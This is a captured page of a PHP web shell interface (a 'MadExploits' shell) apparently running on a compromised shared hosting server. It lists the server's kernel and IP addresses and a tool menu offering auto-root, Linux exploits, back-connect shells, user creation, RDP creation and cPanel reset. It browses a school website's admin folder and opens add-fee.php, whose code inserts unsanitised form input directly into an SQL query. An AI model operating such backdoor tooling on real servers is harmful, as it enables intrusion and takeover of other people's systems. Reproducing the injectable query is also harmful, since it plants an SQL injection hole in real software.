Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.128.200.165
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
gobindpur /
myadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
cbse
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
file
[ DIR ]
drwxr-xr-x
gallery
[ DIR ]
drwxr-xr-x
news-coverage
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
photo
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
shining-star
[ DIR ]
drwxr-xr-x
slider
[ DIR ]
drwxr-xr-x
sym
[ DIR ]
drwxr-xr-x
tc
[ DIR ]
drwxr-xr-x
toppers
[ DIR ]
drwxr-xr-x
Gruntfile.js
6.85
KB
-rwxr-xr-x
add-album.php
1.75
KB
-rwxr-xr-x
add-cbse-corner.php
2.18
KB
-rwxr-xr-x
add-class.php
1.75
KB
-rwxr-xr-x
add-fee.php
3.9
KB
-rwxr-xr-x
add-gallery.php
3.1
KB
-rwxr-xr-x
add-news-coverage.php
2.57
KB
-rwxr-xr-x
add-news.php
2.68
KB
-rwxr-xr-x
add-pages.php
2.2
KB
-rwxr-xr-x
add-pdf.php
2.19
KB
-rwxr-xr-x
add-shining-star.php
2.47
KB
-rwxr-xr-x
add-slide.php
2.22
KB
-rwxr-xr-x
add-tc.php
2.43
KB
-rwxr-xr-x
add-toppers.php
3.28
KB
-rwxr-xr-x
album.php
3.98
KB
-rwxr-xr-x
cbse-corner.php
4.02
KB
-rwxr-xr-x
class.php
3.99
KB
-rwxr-xr-x
config.php
737
B
-rwxr-xr-x
error_log
14.74
KB
-rwxr-xr-x
fee.php
2.98
KB
-rwxr-xr-x
footer.php
8.81
KB
-rwxr-xr-x
gallery.php
4.1
KB
-rwxr-xr-x
header.php
11.43
KB
-rwxr-xr-x
index.php
5.66
KB
-rwxr-xr-x
log.php
1.15
KB
-rwxr-xr-x
login.php
5.74
KB
-rwxr-xr-x
logout.php
132
B
-rwxr-xr-x
news-coverage.php
4.04
KB
-rwxr-xr-x
news.php
4.29
KB
-rwxr-xr-x
pages.php
3.99
KB
-rwxr-xr-x
pdf.php
4.09
KB
-rwxr-xr-x
register.php
3.09
KB
-rwxr-xr-x
shining-star.php
4.07
KB
-rwxr-xr-x
slide.php
4.03
KB
-rwxr-xr-x
tc.php
4.04
KB
-rwxr-xr-x
toppers.php
4.23
KB
-rwxr-xr-x
update-fee.php
4.51
KB
-rwxr-xr-x
update-news.php
2.96
KB
-rwxr-xr-x
update-pages.php
2.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add-fee.php
<?php include('header.php');?> <!-- =============================================== --> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Add Fee Structure </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li><a href="#">Add Fee Structure</a></li> <li class="active">Add</li> </ol> </section> <div class="callout callout-info"> <h4>Tip!</h4> <p>This page will use to add new fee structure in the admin panel.</p> </div> <!-- Default box --> <?php if(isset($_POST['upload'])) { $title = $_POST['title']; $detail = $_POST['editor']; $query = "INSERT INTO `fee` (`id`, `title`, `detail`) VALUES (NULL, '$title', '$detail')"; $query_1 = mysqli_query($mysql_con,$query); if($query_1 > 0) { header('location: fee.php'); } else{ echo "Something wrong, Please try again"; } } ?> <!-- Main content --> <section class="content"> <div class="row"> <!-- form start --> <form method="Post" role="form" enctype="multipart/form-data"> <div class="box-body"> <div class="form-group"> <div class="row"> <div class="col-md-12"> <div class="box box-info"> <div class="box-header"> <h3 class="box-title">Add fee detail </h3> <!-- tools box --> <!-- /. tools --> </div> <div class="form-group"> <label for="exampleInputEmail1">Fee Title</label> <input type="text" name="title" class="form-control" id="exampleInputEmail1" placeholder="Enter class"> </div> <!-- /.box-header --> <div class="box-body pad"> <label for="exampleInputEmail1">Detail</label> <textarea id="editor1" name="editor" rows="10" cols="80"> </textarea> </div> <div class="box-footer"> <button type="submit" name="upload" value="submit" class="btn btn-primary">Submit</button> </div> </div> </div> </div> <!-- /.box --> </div> <!-- /.col--> </div> </form> </div> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <script src="plugins/jQuery/jquery-2.2.3.min.js"></script> <!-- Bootstrap 3.3.6 --> <script src="bootstrap/js/bootstrap.min.js"></script> <!-- FastClick --> <script src="plugins/fastclick/fastclick.js"></script> <!-- AdminLTE App --> <script src="dist/js/app.min.js"></script> <!-- AdminLTE for demo purposes --> <script src="dist/js/demo.js"></script> <!-- CK Editor --> <script src="https://cdn.ckeditor.com/4.5.7/standard/ckeditor.js"></script> <!-- Bootstrap WYSIHTML5 --> <script src="plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.all.min.js"></script> <script> $(function () { // Replace the <textarea id="editor1"> with a CKEditor // instance, using default configuration. CKEDITOR.replace('editor1'); //bootstrap WYSIHTML5 - text editor $(".textarea").wysihtml5(); }); </script> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include("footer.php"); ?>
Close